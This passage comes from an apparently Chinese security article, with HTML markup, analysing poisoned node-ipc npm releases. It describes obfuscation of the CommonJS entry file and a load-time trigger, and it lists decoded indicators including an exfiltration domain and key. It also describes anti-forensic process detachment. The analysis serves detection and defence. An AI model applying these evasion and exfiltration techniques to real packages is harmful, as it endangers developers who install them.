src="https://wechat2rss.xlab.app/img-proxy/?k=c0de2a97&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F8z8bibAexaCIGTCpj1Mh0PicUKWccMDy76MKJM7aCjWiaAqF8vic6K9lXXO97jhH0lLibnoJibbDSMZXLqD8Hib7iaQYBRAFKHNvwMl2u2HwJ84K80U%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 14px;font-weight: normal;">(<a href="https://enterprise.misteye.io/threat-intelligence/SM-2026-356191)" target="_blank">https://enterprise.misteye.io/threat-intelligence/SM-2026-356191)</a></span></span></p><h1 dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 24px;font-weight: bold;">技术分析</span></span></h1><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 18px;font-weight: bold;">样本差异与入口注入：</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">本轮投毒覆盖版本为 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">node-ipc@9.1.6</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">、</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">node-ipc@9.2.3</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">、</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">node-ipc@12.0.1</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">，均为 2026 年 5 月 14 日发布。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"><img class="rich_pages wxw-img" data-aistatus="1" data-croporisrc="https://mmbiz.qpic.cn/sz_mmbiz_png/8z8bibAexaCJkQQ5Szb92mOibiaB4b1I0SXIWT0p43iaUgxl1DYichSM8hica8Z0icwLqgBMicI9AiaMhlibKbP9L1Nicrc4se1icNedPBJFUrwrlED5Nkg/0?wx_fmt=png&amp;from=appmsg" data-cropx2="473" data-cropy1="127" data-cropy2="399" data-imgfileid="100021339" data-ratio="0.5750528541226215" style="margin-left:0px;margin-top:0px;width:473px;height:272px;" data-type="png" data-w="473" src="https://wechat2rss.xlab.app/img-proxy/?k=b212e3b9&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2F8z8bibAexaCIMunU4f7cXv9IgqqceRnyp6ibNnqKUriao2TxPYXfkQ08C7YTw9WNXtoau9ua67fLnSCen0lkI7TJKBwjKQUXMkwoxa5UlbH5nY%2F640%3Fwx_fmt%3Djpeg"/></span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 14px;font-weight: normal;">(</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 14px;font-weight: normal;"><a href="https://registry.npmjs.org/node-ipc" target="_blank">https://registry.npmjs.org/node-ipc</a></span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 14px;font-weight: normal;">)</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">三者的官方入口文件内容高度一致，且保留 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">node-ipc</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 真实包元信息。恶意逻辑被注入到 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">node-ipc.cjs</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">，而 ESM (ECMAScript Modules) 入口 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">node-ipc.js</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 保持干净，说明攻击者只在 CommonJS 入口上做了投毒。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">package.json</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 关键字段如下：</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100021338" data-ratio="0.6467532467532467" width="385" data-type="png" data-w="385" height="249" style="margin-left: 0px;margin-top: 0px;" src="https://wechat2rss.xlab.app/img-proxy/?k=4d6feaa0&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F8z8bibAexaCIYTuxKtE5Yotwedct4ux3Etva2du1W3iaOhf6VlFgFtxYwibDC74NvvUj4mzABuzqmtBmoSpTKTkOL7CWDXibs2f8SJjMTNuib0og%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">由此可见，只有 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">require(&#34;node-ipc&#34;)</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 的加载路径会进入污染代码，构成实质攻击入口。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 18px;font-weight: bold;">混淆还原与关键字符串解码：</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">反混淆后可见三类关键技术：</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">1. 控制流平坦化（</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">while(!![]) { switch-case }</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">）用于打乱执行顺序。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">2. 字符串表索引化，真实文本被统一替换为 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">_0x</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 查询函数。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">3. 自定义 Base-16 编码函数将 16 字符表映射为可打印字符串，恢复后可见外传域名与加密材料。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">解码样例：</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">2647M2M6P64656M2G637H -&gt; bt.node.js</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">3786M216G75727563747164796360727P66796465627M2M65647G34343339 -&gt; sh.azurestaticprovider.net:443</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">17G58307J43367M487259377H4K645978426653664764437G41654P655966 -&gt; qZ8pL3vNxR9wKmTyHbVcFgDsJaEoUi</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 18px;font-weight: bold;">三路径触发机制：</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">反混淆逻辑为三种触发场景准备了独立分支：</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100021356" data-ratio="0.6685714285714286" width="525" data-type="png" data-w="525" height="351" style="margin-left: 0px;margin-top: 0px;" src="https://wechat2rss.xlab.app/img-proxy/?k=d32509ad&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F8z8bibAexaCKjLpVRbiafxKtPvqeHoQib1LQ51EBhyH9p0AErOicpmlVoUxhrML1JNzHgmoxv5D9q3GfvExYdsA28RqaJl33sWD2KsYHAiaxTMnE%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></b></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">最常见的下游项目场景对应第 13 行分支，</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">setImmediate</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 延迟触发减少人工感知，导致仅需引入依赖即被激活。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 18px;font-weight: bold;">进程脱离与反取证设置：</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">恶意逻辑会在必要时 fork 子进程并清理上下文，降低静态行为与动态检测的可见性。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100021342" data-ratio="0.7567567567567568" width="481" data-type="png" data-w="481" height="364" style="margin-left: 0px;margin-top: 0px;" src="https://wechat2rss.xlab.app/img-proxy/?k=f65f172d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F8z8bibAexaCIgtFzXG3pyUmVZUibEeEUiaS89sMgbwZdODggZ5dfCw3R1XbiajZ5E151eUzIYcJicJSYBDThvR3qMw7vTNria2zC7p8pj7SoHU3Tw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">detached: true</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 使子进程脱离终端，</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">stdio: &#34;ignore&#34;</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 抑制标准输入输出，</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">delete NODE_OPTIONS</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 